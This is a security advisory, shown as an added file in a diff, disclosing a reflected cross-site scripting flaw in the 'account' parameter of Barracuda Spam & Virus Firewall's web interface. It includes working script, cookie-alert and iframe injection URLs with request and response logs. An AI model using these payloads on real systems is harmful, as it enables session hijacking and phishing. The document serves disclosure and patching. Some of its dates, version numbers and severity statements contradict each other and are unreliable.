|
| 1 | +Document Title: |
| 2 | +=============== |
| 3 | +Barracuda Networks Spam&Virus Firewall v5.1.3 - Client Side Cross Site Vulnerability |
| 4 | + |
| 5 | + |
| 6 | +References (Source): |
| 7 | +==================== |
| 8 | +http://www.vulnerability-lab.com/get_content.php?id=1118 |
| 9 | + |
| 10 | +Barracuda Networks Security ID (BNSEC): BNSEC-1052 |
| 11 | +https://www.barracuda.com/support/knowledgebase/501600000013lYI |
| 12 | + |
| 13 | +Solution #00006606 |
| 14 | +BNSEC-01052: Non-persistent XSS in Barracuda Spam and Virus Firewall v5.1.3 |
| 15 | + |
| 16 | + |
| 17 | +Release Date: |
| 18 | +============= |
| 19 | +2014-07-25 |
| 20 | + |
| 21 | + |
| 22 | +Vulnerability Laboratory ID (VL-ID): |
| 23 | +==================================== |
| 24 | +1118 |
| 25 | + |
| 26 | + |
| 27 | +Common Vulnerability Scoring System: |
| 28 | +==================================== |
| 29 | +2.9 |
| 30 | + |
| 31 | + |
| 32 | +Product & Service Introduction: |
| 33 | +=============================== |
| 34 | +For efficient, effective corporate communication and collaboration, today’s organizations need more than just |
| 35 | +security against spam and malware. They need a comprehensive email governance solution that combines granular |
| 36 | +policy management, real-time visibility into email activity, and the ability to handle massive volume and |
| 37 | +huge files. Barracuda Spam & Virus Firewall is today’s solution for comprehensive email governance. |
| 38 | + |
| 39 | +(Copy of the Vendor Product Homepage: https://www.barracuda.com/products/spamandvirusfirewall/ ) |
| 40 | + |
| 41 | + |
| 42 | +Abstract Advisory Information: |
| 43 | +============================== |
| 44 | +The Vulnerability Laboratory Research Team discovered a client-side cross site vulnerability in the Barracuda Spam and Virus Firewall v5.1.3 (200,400 or 600) & Vx web-application. |
| 45 | + |
| 46 | + |
| 47 | +Vulnerability Disclosure Timeline: |
| 48 | +================================== |
| 49 | +2013-11-19: Researcher Notification & Coordination (Ateeq Khan) |
| 50 | +2013-11-19: Vendor Notification (Barracuda Networks Security Incident Team - Bug Bounty Program) |
| 51 | +2014-12-20: Vendor Response/Feedback (Barracuda Networks Security Incident Team - Bug Bounty Program) |
| 52 | +2014-07-15: Vendor Fix/Patch (Barracuda Networks Developer Team) |
| 53 | +2014-07-25: Public Disclosure (Vulnerability Laboratory) |
| 54 | + |
| 55 | + |
| 56 | +Discovery Status: |
| 57 | +================= |
| 58 | +Published |
| 59 | + |
| 60 | + |
| 61 | +Affected Product(s): |
| 62 | +==================== |
| 63 | +Barracuda Networks |
| 64 | +Product: Spam & Virus Firewall 6.0.0.028 - 100 200 300 400 500 600 700 800 900 1000 |
| 65 | + |
| 66 | + |
| 67 | +Exploitation Technique: |
| 68 | +======================= |
| 69 | +Remote |
| 70 | + |
| 71 | + |
| 72 | +Severity Level: |
| 73 | +=============== |
| 74 | +Medium |
| 75 | + |
| 76 | + |
| 77 | +Technical Details & Description: |
| 78 | +================================ |
| 79 | +A client-side cross site scripting web vulnerability is detected in the official Barracuda Spam & Antivirus Firewall Web-Application. |
| 80 | +The vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (client-side). |
| 81 | + |
| 82 | +The vulnerability is located in the `Per User Account View` module of the security appliance web-application. The vulnerable file is |
| 83 | +index.cgi and the affected value is `account`. Remote attackers can inject own malicious script codes on client-side. The attack |
| 84 | +vector of the issue is non-persistent and the request method to execute the malicious code is GET. Remote attackers can for example |
| 85 | +send manipualted links to priviledged application users to hijack session information (client-side) or execute non persistent codes. |
| 86 | + |
| 87 | +The security risk of the non-persistent input validation web vulnerability is estimated as low with a cvss (common vulnerability |
| 88 | +scoring system) count of 2.9. The non persistent cross site vulnerability can be exploited by remote attackers without privileged |
| 89 | +application user account and with low or medium user interaction. Successful exploitation of the client-side cross site scripting |
| 90 | +web vulnerability results in session hijacking, client-side phishing, client-side unauthorized external redirects and client-side |
| 91 | +manipulation of the connected or affected module context. |
| 92 | + |
| 93 | +Request Method(s): |
| 94 | + [+] GET |
| 95 | + |
| 96 | +Vulnerable Module(s): |
| 97 | + [+] Users > Per User Account View |
| 98 | + |
| 99 | +Vulnerable File(s): |
| 100 | + [+] index.cgi |
| 101 | + |
| 102 | +Vulnerable Parameter(s): |
| 103 | + [+] account= |
| 104 | + |
| 105 | + |
| 106 | +Proof of Concept (PoC): |
| 107 | +======================= |
| 108 | +The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged web-application user account and with |
| 109 | +low user interaction click. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. |
| 110 | + |
| 111 | +Manual steps to reproduce the security vulnerability ... |
| 112 | + |
| 113 | +1. Login to the spam and antivirus firewall as normal guest user |
| 114 | +2. Once logged in, click on the Basic Tab once |
| 115 | +3. Now copy paste the following payload in the URL carefully after the password field replacing all other variables with our string |
| 116 | + |
| 117 | +&primary_tab=USERS&new_secondary_tab=per_user_account_view |
| 118 | +&account=domainadmin@barracuda.comaf92c"><script>alert(1)</script>e352896d01c&auth_type=Local&locale=en_US |
| 119 | +&secondary_tab=per_user_change_password&page_submitted=true&content_only=1&domain=&user=guest&role=&ispopup=1 |
| 120 | +&parent_name=pu_pref637248&popup_width=720&popup_height=500 |
| 121 | + |
| 122 | +4. You should now be able to see a javascript popup revealing the session cookies hence proving the existence of this vulnerability! |
| 123 | + |
| 124 | + |
| 125 | +PoC: Frame Inject |
| 126 | +https://spam.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1382217804&locale=en_US |
| 127 | +&password=03f27a30cecedbbda727698954077eec&primary_tab=USERS&new_secondary_tab=per_user_account_view |
| 128 | +&account=domainadmin@barracuda.comaf92c%3E%3Ciframe%20src=http://www.vulnerability-lab.com%3Ee352896d01c |
| 129 | +&auth_type=Local&locale=en_US&secondary_tab=per_user_change_password&page_submitted=true&content_only=1 |
| 130 | +&domain=&user=guest&role=&ispopup=1&parent_name=pu_pref637248&popup_width=720&popup_height=500 |
| 131 | + |
| 132 | +PoC: Cookie Steal |
| 133 | +https://spam.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1382217804&locale=en_US |
| 134 | +&password=03f27a30cecedbbda727698954077eec&primary_tab=USERS&new_secondary_tab=per_user_account_view |
| 135 | +&account=domainadmin@barracuda.comaf92c%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ee352896d01c |
| 136 | +&auth_type=Local&locale=en_US&secondary_tab=per_user_change_password&page_submitted=true&content_only=1 |
| 137 | +&domain=&user=guest&role=&ispopup=1&parent_name=pu_pref637248&popup_width=720&popup_height=500 |
| 138 | + |
| 139 | + |
| 140 | +Review: Change Password - Mail Session Title |
| 141 | + <tbody><tr><td colspan="1" style="padding:0 0 5px 0;" valign="top" width="100%"> |
| 142 | + <table border="0" cellpadding="0" cellspacing="0" width="100%"> |
| 143 | + <tbody><tr><td class="TitleLeft"></td><td class="TitleTop"> |
| 144 | + <table border="0" cellpadding="0" cellspacing="0" width="100%"> |
| 145 | + <tbody><tr><td><a name="Change Password:domainadmin@barracuda.comaf92c> |
| 146 | +<iframe src=http://www.vulnerability-lab.com>e352896d01c"> |
| 147 | +Change Password:domainadmin@barracuda.comaf92c><iframe src="http://www.vulnerability-lab.com">e352896d01c</td> |
| 148 | + |
| 149 | + |
| 150 | + |
| 151 | +--- PoC Session Request Logs --- |
| 152 | +Request: |
| 153 | +-------- |
| 154 | +GET /cgi-mod/index.cgi?auth_type=Local&et=1382217804&locale=en_US&password=03f27a30cecedbbda727698954077eec&primary_tab=USERS&new_secondary_tab=per_user_account_view&account=domainadmin@barracuda.comaf92c%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee352896d01c&auth_type=Local&locale=en_US&secondary_tab=per_user_change_password&page_submitted=true&content_only=1&domain=&user=guest&role=&ispopup=1&parent_name=pu_pref637248&popup_width=720&popup_height=500 HTTP/1.1 |
| 155 | +Host: spam.ptest.cudasvc.com |
| 156 | +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 |
| 157 | +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 |
| 158 | +Accept-Language: en-US,en;q=0.5 |
| 159 | +Accept-Encoding: gzip, deflate |
| 160 | +DNT: 1 |
| 161 | +Cookie: ys-preview_west=o%3Acollapsed%3Db%253A1; ys-preview_south=o%3Acollapsed%3Db%253A1; ys-preview_east=o%3Acollapsed%3Db%253A0 |
| 162 | +Connection: keep-alive |
| 163 | + |
| 164 | +Response: |
| 165 | +--------- |
| 166 | +HTTP/1.1 200 OK |
| 167 | +Server: BarracudaHTTP 4.0 |
| 168 | +Content-Type: text/html; charset=utf-8 |
| 169 | +Connection: keep-alive |
| 170 | +Set-Cookie: ys-preview_west=o%3Acollapsed%3Db%253A1; path=/ |
| 171 | +Set-Cookie: ys-preview_south=o%3Acollapsed%3Db%253A1; path=/ |
| 172 | +Set-Cookie: ys-preview_east=o%3Acollapsed%3Db%253A0; path=/ |
| 173 | +Expires: Thu, 18 Oct 2012 23:48:26 GMT |
| 174 | +Date: Fri, 18 Oct 2013 23:48:26 GMT |
| 175 | +Content-Length: 8325 |
| 176 | + |
| 177 | +<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head> |
| 178 | +<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> |
| 179 | +<meta http-equiv="X-UA-Compatible" content="IE=edge"> |
| 180 | + |
| 181 | +...[Trimmed]... |
| 182 | +<a name="Change Password:domainadmin@barracuda.comaf92c"><script>alert(document.cookie)</script>e352896d01c"/> |
| 183 | +...[Trimmed]... |
| 184 | + |
| 185 | + |
| 186 | +Reference(s): |
| 187 | +https://spam.ptest.cudasvc.com/cgi-mod/index.cgi |
| 188 | + |
| 189 | + |
| 190 | +Solution - Fix & Patch: |
| 191 | +======================= |
| 192 | +The vulnerability can be patched by a secure parse of the account and session id echo when processing to reset passwords via the email address. |
| 193 | +Parse the parameter value input of the account and encode the output in the session values. |
| 194 | + |
| 195 | +Barracuda Networks: Appliances > Advanced > Firmware Updates (automatic) page or use the regular customer panel |
| 196 | +https://www.barracuda.com/support/knowledgebase/501600000013lYI |
| 197 | + |
| 198 | + |
| 199 | +Security Risk: |
| 200 | +============== |
| 201 | +The security risk of the client-side cross site scripting web vulnerability is estimated as medium. |
| 202 | + |
| 203 | + |
| 204 | +Credits & Authors: |
| 205 | +================== |
| 206 | +Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com] |
| 207 | + |
| 208 | + |
| 209 | +Disclaimer & Information: |
| 210 | +========================= |
| 211 | +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either |
| 212 | +expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers |
| 213 | +are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even |
| 214 | +if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation |
| 215 | +of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break |
| 216 | +any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. |
| 217 | + |
| 218 | +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com |
| 219 | +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com |
| 220 | +Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com |
| 221 | +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab |
| 222 | +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php |
| 223 | +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ |
| 224 | + |
| 225 | +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to |
| 226 | +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by |
| 227 | +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website |
| 228 | +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact |
| 229 | +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. |
| 230 | + |
| 231 | + Copyright © 2014 | Vulnerability Laboratory [Evolution Security] |
| 232 | + |
| 233 | + |
| 234 | +-- |
| 235 | +VULNERABILITY LABORATORY RESEARCH TEAM |
| 236 | +DOMAIN: www.vulnerability-lab.com |
| 237 | +CONTACT: research@vulnerability-lab.com |
| 238 | + |
0 commit comments